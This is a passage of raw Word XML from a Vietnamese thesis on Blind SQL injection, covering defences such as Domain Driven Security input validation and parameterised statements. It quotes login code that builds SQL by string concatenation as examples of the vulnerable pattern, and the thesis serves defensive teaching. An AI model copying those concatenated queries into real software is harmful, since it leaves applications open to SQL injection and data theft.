        <w:t xml:space="preserve"> hoàn toàn có thể áp dụng phương pháp này để thực hiện tối ưu hóa tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D665C" w:rsidRPr="00757273" w:rsidRDefault="00E2762E" w:rsidP="00757273">
      <w:r>
        <w:t xml:space="preserve">Điều đó cho phép tối ưu hóa tấn công Blind SQL injection, từ đó giúp tăng tốc độ tấn công, cũng như tiết kiệm thời gian, băng thông của cuộc tấn công. </w:t>
      </w:r>
      <w:r w:rsidR="006D6FC6">
        <w:t xml:space="preserve">Đa số các mệnh đề SQL được cộng phía sau mệnh đề WHERE, mà mệnh đề ORDER BY phía sau nên hoàn toàn có thể sử dụng được. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRDefault="003F7098" w:rsidP="00E64461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_Toc459374346"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Giải pháp phòng chống tấn</w:t>
      </w:r>
      <w:r w:rsidR="002B02EF" w:rsidRPr="005D3C52">
        <w:t xml:space="preserve"> công SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
      <w:r w:rsidR="002B02EF" w:rsidRPr="005D3C52">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E93309" w:rsidRPr="00BF58E1" w:rsidRDefault="00E93309" w:rsidP="00E93309">
      <w:r>
        <w:t xml:space="preserve">Các phần trên luận văn đã trình bày các phương pháp tấn công và tối ưu hóa tấn công Blind SQL injection. Tuy nhiên, một câu hỏi được đặt ra làm thế nào để phòng tránh, cũng như khắc phục lỗ hổng </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">này. Làm thế nào có thể ngăn chặn lỗ hổng này, ngay cả khi đó là một ứng dụng dễ dàng mắc lỗi SQL injection. </w:t>
      </w:r>
      <w:r w:rsidRPr="00571796">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Một chuyên gia tư vấn ATTT cần cung cấp cho khách hàng lời khuyên trong những hoàn cảnh như vậy, các lời khuyên, kỹ thuật để làm giảm và loại bỏ các nguy cơ của SQL injection</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E93309" w:rsidRPr="00E93309" w:rsidRDefault="00E93309" w:rsidP="00E93309">
      <w:r>
        <w:t>Trong phần này, luận văn sẽ trình bày về các phương pháp phòng chống lỗ hổng SQL injection nói chung, cũng như phương pháp áp dụng trong trường hợp sử dụng kỹ thuật tối ưu này.</w:t>
      </w:r>
      <w:r w:rsidR="00C40E72">
        <w:t xml:space="preserve"> Các phương pháp này gồm các kỹ thuật lập trình an toàn, có liên quan đến SQL injection. </w:t>
      </w:r>
      <w:r w:rsidR="004D72F3">
        <w:t xml:space="preserve">Đây là các phương pháp giúp nhà phát triển, lập trình viên có thể giảm thiểu được các cuộc tấn công. </w:t>
      </w:r>
      <w:r w:rsidR="00D14C13">
        <w:t>Đặc biệt, luận văn đi sâu vào phương pháp để tạo ra chuỗi string động đảm bảo an toàn, phòng chống được tấ</w:t>
      </w:r>
      <w:r w:rsidR="00F97590">
        <w:t>n công SQL injection, cũng như các phương pháp xử lý đầu vào phù hợp với người dùng. Liên quan đến các kỹ thuật xử lý đầu vào, phần này cũng trình bày các kỹ thuật xử lý đầu ra liên quan. Cuối cùng trong phần này luận văn sẽ trình bày về các thiết kế giúp nâng cao độ an toàn của ứng dụng.</w:t>
      </w:r>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bookmarkStart w:id="108" w:name="_Toc458409301"/>
      <w:bookmarkStart w:id="109" w:name="_Toc458409371"/>
      <w:bookmarkStart w:id="110" w:name="_Toc458433497"/>
      <w:bookmarkStart w:id="111" w:name="_Toc459373914"/>
      <w:bookmarkStart w:id="112" w:name="_Toc459373974"/>
      <w:bookmarkStart w:id="113" w:name="_Toc459374347"/>
      <w:bookmarkEnd w:id="108"/>
      <w:bookmarkEnd w:id="109"/>
      <w:bookmarkEnd w:id="110"/>
      <w:bookmarkEnd w:id="111"/>
      <w:bookmarkEnd w:id="112"/>
      <w:bookmarkEnd w:id="113"/>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bookmarkStart w:id="114" w:name="_Toc458409302"/>
      <w:bookmarkStart w:id="115" w:name="_Toc458409372"/>
      <w:bookmarkStart w:id="116" w:name="_Toc458433498"/>
      <w:bookmarkStart w:id="117" w:name="_Toc459373915"/>
      <w:bookmarkStart w:id="118" w:name="_Toc459373975"/>
      <w:bookmarkStart w:id="119" w:name="_Toc459374348"/>
      <w:bookmarkEnd w:id="114"/>
      <w:bookmarkEnd w:id="115"/>
      <w:bookmarkEnd w:id="116"/>
      <w:bookmarkEnd w:id="117"/>
      <w:bookmarkEnd w:id="118"/>
      <w:bookmarkEnd w:id="119"/>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bookmarkStart w:id="120" w:name="_Toc458409303"/>
      <w:bookmarkStart w:id="121" w:name="_Toc458409373"/>
      <w:bookmarkStart w:id="122" w:name="_Toc458433499"/>
      <w:bookmarkStart w:id="123" w:name="_Toc459373916"/>
      <w:bookmarkStart w:id="124" w:name="_Toc459373976"/>
      <w:bookmarkStart w:id="125" w:name="_Toc459374349"/>
      <w:bookmarkEnd w:id="120"/>
      <w:bookmarkEnd w:id="121"/>
      <w:bookmarkEnd w:id="122"/>
      <w:bookmarkEnd w:id="123"/>
      <w:bookmarkEnd w:id="124"/>
      <w:bookmarkEnd w:id="125"/>
    </w:p>
    <w:p w:rsidR="003006E8" w:rsidRDefault="00B4125E" w:rsidP="00BF58E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="126" w:name="_Toc459374350"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4125E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Domain Driven Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="126"/>
    </w:p>
    <w:p w:rsidR="00B05040" w:rsidRDefault="00B4125E" w:rsidP="00B05040">
      <w:r w:rsidRPr="00B4125E">
        <w:t>Domain Driven Security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (DDS) </w:t>
      </w:r>
      <w:r w:rsidR="00412534">
        <w:t xml:space="preserve">là phương pháp tiếp cận cơ bản nhất để phòng tránh các lỗ hổng dạng injection nói chung. Nếu như nhìn kỹ vào </w:t>
      </w:r>
      <w:r w:rsidR="00F7715B">
        <w:t>các đoạn code mắc lỗi SQL injection sẽ thấy rằng cách xử lý tương đối giống nhau:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B93CAD" w:rsidRPr="00B93CAD" w:rsidTr="00B93CAD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B93CAD" w:rsidRPr="00B93CAD" w:rsidRDefault="00B93CAD" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00B93CAD">
              <w:t>public boolean isValidPassword(String username, String password) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B93CAD" w:rsidRPr="009F090B" w:rsidRDefault="009F090B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r w:rsidR="00B93CAD" w:rsidRPr="00B93CAD">
              <w:t xml:space="preserve">String sql = “SELECT </w:t>
            </w:r>
            <w:r w:rsidR="00B93CAD" w:rsidRPr="00B93CAD">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
              </w:rPr>
              <w:t>∗</w:t>
            </w:r>
            <w:r w:rsidR="00B93CAD" w:rsidRPr="00B93CAD">
              <w:t xml:space="preserve"> FROM user WHERE username=’” + username + “’ AND password=’” +</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00B93CAD" w:rsidRPr="00B93CAD">
              <w:t>password + “’”;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B93CAD" w:rsidRPr="00B93CAD" w:rsidRDefault="009F090B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r w:rsidR="00B93CAD" w:rsidRPr="00B93CAD">
              <w:t>Result result = query(sql);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B93CAD" w:rsidRPr="00B93CAD" w:rsidRDefault="009F090B" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r w:rsidR="00B93CAD" w:rsidRPr="00B93CAD">
              <w:t>...</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B93CAD" w:rsidRPr="00B93CAD" w:rsidRDefault="00B93CAD" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00B93CAD">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F7715B" w:rsidRDefault="00350793" w:rsidP="00B05040">
      <w:r>
        <w:t xml:space="preserve">Dễ thấy rằng việc xử lý đầu vào là sai, đang mắc lỗi. Trong hầu hết các ứng dụng, đầu vào từ người dùng thường có các ràng buộc cụ thể: độ dài, loại ký tự. Tuy nhiên trong đoạn mã nguồn trên hoàn toàn không thấy có sự kiểm soát này. </w:t>
      </w:r>
      <w:r w:rsidR="00091C83">
        <w:t xml:space="preserve">DDS được phát triển dựa trên </w:t>
      </w:r>
      <w:r w:rsidR="00091C83" w:rsidRPr="00091C83">
        <w:t>Domain Driven Design (DDD)</w:t>
      </w:r>
      <w:r w:rsidR="00091C83">
        <w:t>, bằng cách đưa ra các điều kiện, ràng buộc dựa trên nghiệp vụ của ứng dụ</w:t>
      </w:r>
      <w:r w:rsidR="007D081B">
        <w:t xml:space="preserve">ng, và sử dụng trong mô hình miền (Domain Model). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2208A" w:rsidRDefault="00D2208A" w:rsidP="001B68FE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FCE90D3" wp14:editId="0296A9B3">
            <wp:extent cx="3344090" cy="3211373"/>
            <wp:effectExtent l="19050" t="0" r="871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344293" cy="3211568"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00470368" w:rsidRDefault="00D2208A" w:rsidP="00D2208A">
      <w:r>
        <w:t xml:space="preserve">Trong hình trên thể hiện quá trình ánh xạ dữ liệu giữa các thành phần trong ứng dụng. </w:t>
      </w:r>
      <w:r w:rsidR="005D256F">
        <w:t>Có 03 cách đại diện của username. ở thành phần Browser, thì được nhận diện là dạng chuỗi (string)</w:t>
      </w:r>
      <w:r w:rsidR="00470368">
        <w:t xml:space="preserve">, tiếp tục là string ở lớp </w:t>
      </w:r>
      <w:r w:rsidR="00470368">
        <w:lastRenderedPageBreak/>
        <w:t>server si</w:t>
      </w:r>
      <w:r w:rsidR="00470368">
        <w:lastRenderedPageBreak/>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00470368">
        <w:lastRenderedPageBreak/>
        <w:t>e và một dạng dữ liệu ở phía máy chủ cơ sở dữ liệu.</w:t>
      </w:r>
      <w:r w:rsidR="00BB2579">
        <w:t xml:space="preserve"> Nếu như ánh xạ như vậy, với chuỗi admin thì hoàn toàn đúng, còn với chuỗi bên tay phải thì sẽ kết thúc với một dữ liệu hoàn toàn khác từ trình duyệt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F6601" w:rsidRDefault="009F6601" w:rsidP="00D2208A">
      <w:r>
        <w:t>Rõ ràng username và password đều là các thành phần tiềm ẩn</w:t>
      </w:r>
      <w:r w:rsidR="003E593C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003E593C" w:rsidRPr="00091C83">
        <w:t>DDD</w:t>
      </w:r>
      <w:r w:rsidR="003E593C">
        <w:t xml:space="preserve"> cung cấp các phương hướng, phân loại dữ liệu rõ ràng. </w:t>
      </w:r>
      <w:r w:rsidR="00254900">
        <w:t xml:space="preserve">Trong ngôn ngữ Java, có thể tạo ra một lớp đối tượng </w:t>
      </w:r>
      <w:r w:rsidR="00EE4B21">
        <w:t xml:space="preserve">username </w:t>
      </w:r>
      <w:r w:rsidR="00254900">
        <w:t>như sau:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A65033" w:rsidRPr="00A65033" w:rsidTr="00A65033">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009147F6" w:rsidRPr="009147F6" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:t>public class Username {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009147F6" w:rsidRPr="009147F6" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
              <w:t>private static Pattern USERNAME_PATTERN = Pattern.compile(“^[a-z]{4,20}$”);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009147F6" w:rsidRPr="009147F6" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
              <w:t>private final String username;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009147F6" w:rsidRPr="009147F6" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
              <w:t>public Username(String username) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009147F6" w:rsidRPr="009147F6" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
              <w:t>if (!isValid(username)) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009147F6" w:rsidRPr="009147F6" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
              <w:t>throw new IllegalArgumentException(“Invalid username: ” + username);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009147F6" w:rsidRPr="009147F6" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009147F6" w:rsidRPr="009147F6" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
              <w:t>this.username = username;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009147F6" w:rsidRPr="009147F6" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009147F6" w:rsidRPr="009147F6" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
              <w:t>public static boolean isValid(String username) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009147F6" w:rsidRPr="009147F6" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
              <w:t>return USERNAME_PATTERN.matcher(username).matches();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009147F6" w:rsidRPr="009147F6" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A65033" w:rsidRPr="00A65033" w:rsidRDefault="009147F6" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="009147F6">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00254900" w:rsidRDefault="00187A14" w:rsidP="00D2208A">
      <w:r>
        <w:t>Đầu vào thô từ người dùng sẽ được đóng gói, và thực hiện kiểm tra</w:t>
      </w:r>
      <w:r w:rsidR="00B73288">
        <w:t xml:space="preserve"> đầu vào. Với bất kỳ dữ liệu nào cũng phải đảm bảo quy tắc dữ liệu này. Không có cách nào tạo ra một username không hợp lệ. </w:t>
      </w:r>
      <w:r w:rsidR="000F595C">
        <w:t>phương pháp này cũng đem lại sự đơn giản hóa trong việc kiểm tra, thực hiện tại một vị trí cơ bả</w:t>
      </w:r>
      <w:r w:rsidR="009733F8">
        <w:t>n, cũng như đơn giản việc tìm kiếm h</w:t>
      </w:r>
      <w:r w:rsidR="009733F8">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">àm kiểm tra trong quá trình phát triển. </w:t>
      </w:r>
      <w:r w:rsidR="00A970BE">
        <w:t>Sau khi áp dụng phương pháp này, quá trình xử lý đầu vào được mô tả như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2208A" w:rsidRDefault="00A970BE" w:rsidP="000A3157">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68F8F099" wp14:editId="3132FCBF">
            <wp:extent cx="3398215" cy="3284524"/>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3398104" cy="3284417"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A970BE" w:rsidRPr="00B05040" w:rsidRDefault="008C75CB" w:rsidP="008C75CB">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Giá trị bên phải không thỏa mãn ràng buộc đã được thiết lập, do đó không thể chuyển xuống lớp Database thực thi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00455D2B" w:rsidRDefault="00455D2B" w:rsidP="00BF58E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="127" w:name="_Toc459374351"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Sử dụng kỹ thuật Prepare Statement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/>
    </w:p>
    <w:p w:rsidR="00A909F8" w:rsidRDefault="00A909F8" w:rsidP="00A909F8">
      <w:r>
        <w:t>Như trong các phần trước, nguyên nhân gốc rễ</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">của lỗi SQL injection nằm ở việc sinh ra câu truy vấn SQL, và gửi câu truy vấn này đến DBMS để thực thi. </w:t>
      </w:r>
      <w:r w:rsidR="008724FC">
        <w:t>Kỹ thuật này thường được gọi là xây chuỗi truy vấn động (</w:t>
      </w:r>
      <w:r w:rsidR="008724FC" w:rsidRPr="008724FC">
        <w:t>dynamic string building</w:t>
      </w:r>
      <w:r w:rsidR="008724FC">
        <w:t xml:space="preserve"> hoặc </w:t>
      </w:r>
      <w:r w:rsidR="008724FC" w:rsidRPr="008724FC">
        <w:t>dynamic SQL</w:t>
      </w:r>
      <w:r w:rsidR="008724FC">
        <w:t xml:space="preserve">). Đây là nguyên nhân cơ bản gây ra lỗi SQL injection. </w:t>
      </w:r>
      <w:r w:rsidR="003E7AA8">
        <w:t xml:space="preserve">Để cung cấp việc an toàn hơn trong xây dựng câu truy vấn động, các ngôn ngữ lập trình và </w:t>
      </w:r>
      <w:r w:rsidR="003E7AA8" w:rsidRPr="003E7AA8">
        <w:t>database access application program interfaces (APIs)</w:t>
      </w:r>
      <w:r w:rsidR="003E7AA8">
        <w:t xml:space="preserve"> ngày nay cung cấp cho lập trình viên kỹ thuật tham số hóa câu truy vấn, </w:t>
      </w:r>
      <w:r w:rsidR="009A0CAF">
        <w:t>thông qua việc thiết lập vị trí của biến, tạo các ràng buộc với biến do người dùng</w:t>
      </w:r>
      <w:r w:rsidR="009A0CAF">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> nhập vào.</w:t>
      </w:r>
      <w:r w:rsidR="007700D0">
        <w:t xml:space="preserve"> Kỹ thuật này thường được gọi là tham số hóa (</w:t>
      </w:r>
      <w:r w:rsidR="007700D0" w:rsidRPr="007700D0">
        <w:t>parameterized statements</w:t>
      </w:r>
      <w:r w:rsidR="007700D0">
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r w:rsidR="009A0CAF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007700D0">
        <w:t>là phương pháp cơ bản để giải quyết các vấn đề liên quan đến lỗ hổng SQL injection</w:t>
      </w:r>
      <w:r w:rsidR="00D10288">
        <w:t>, được sử dụng phổ biến để sinh ra chuỗi truy vấn động. Phương pháp này cũng có lợi thế trong việc tối ưu câu truy vấn, giúp tăng hiệu quả của những câu truy vấn tiếp theo.</w:t>
      </w:r>
      <w:r w:rsidR="006674E2">
        <w:t xml:space="preserve"> Cùng xem xét ví dụ sau:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9288"/>
      </w:tblGrid>
      <w:tr w:rsidR="006674E2" w:rsidRPr="006674E2" w:rsidTr="006674E2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9621" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006674E2" w:rsidRPr="006674E2" w:rsidRDefault="006674E2" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006674E2">
              <w:t>Username = request(“username”)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006674E2" w:rsidRPr="006674E2" w:rsidRDefault="006674E2" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006674E2">
              <w:t>Password = request(“password”)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006674E2" w:rsidRPr="006674E2" w:rsidRDefault="006674E2" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006674E2">
              <w:t xml:space="preserve">Sql = “SELECT </w:t>
            </w:r>
            <w:r w:rsidRPr="006674E2">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
              </w:rPr>
              <w:t>∗</w:t>
            </w:r>
            <w:r w:rsidRPr="006674E2">
              <w:t xml:space="preserve"> FROM users WHERE username=’” + Username + “‘ AND password=’”+ Password + “’”</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006674E2" w:rsidRPr="006674E2" w:rsidRDefault="006674E2" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006674E2">
              <w:t>Result = Db.Execute(Sql)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006674E2" w:rsidRPr="006674E2" w:rsidRDefault="006674E2" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006674E2">
              <w:t>If (Result) /</w:t>
            </w:r>
            <w:r w:rsidRPr="006674E2">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
              </w:rPr>
              <w:t>∗</w:t>
            </w:r>
            <w:r w:rsidRPr="006674E2">
              <w:t xml:space="preserve"> successful login </w:t>
            </w:r>
            <w:r w:rsidRPr="006674E2">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
              </w:rPr>
              <w:t>∗</w:t>
            </w:r>
            <w:r w:rsidRPr="006674E2">
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006674E2" w:rsidRDefault="00621DB2" w:rsidP="001F7343">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Lần lượt, luận văn sẽ xem xét phương pháp triển khai </w:t>
      </w:r>
      <w:r w:rsidR="00A5726C">
        <w:t xml:space="preserve">tham số hóa trong </w:t>
      </w:r>
      <w:r w:rsidR="00A5726C" w:rsidRPr="00A5726C">
        <w:t xml:space="preserve">Java, C#, </w:t>
      </w:r>
      <w:r w:rsidR="00A5726C">
        <w:t>và</w:t>
      </w:r>
      <w:r w:rsidR="00A5726C" w:rsidRPr="00A5726C">
        <w:t xml:space="preserve"> PHP</w:t>
      </w:r>
      <w:r w:rsidR="00A5726C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00AF144B">
        <w:t xml:space="preserve">Java cung cấp </w:t>
      </w:r>
      <w:r w:rsidR="00AF144B" w:rsidRPr="00AF144B">
        <w:t>Java Database Connectivity (JDBC)</w:t>
      </w:r>
      <w:r w:rsidR="00AF144B">
        <w:t xml:space="preserve"> Framework</w:t>
      </w:r>
      <w:r w:rsidR="001F7343">
        <w:t xml:space="preserve"> (nằm trong java.sql và javax.sql namespaces)</w:t>
      </w:r>
      <w:r w:rsidR="00566767">
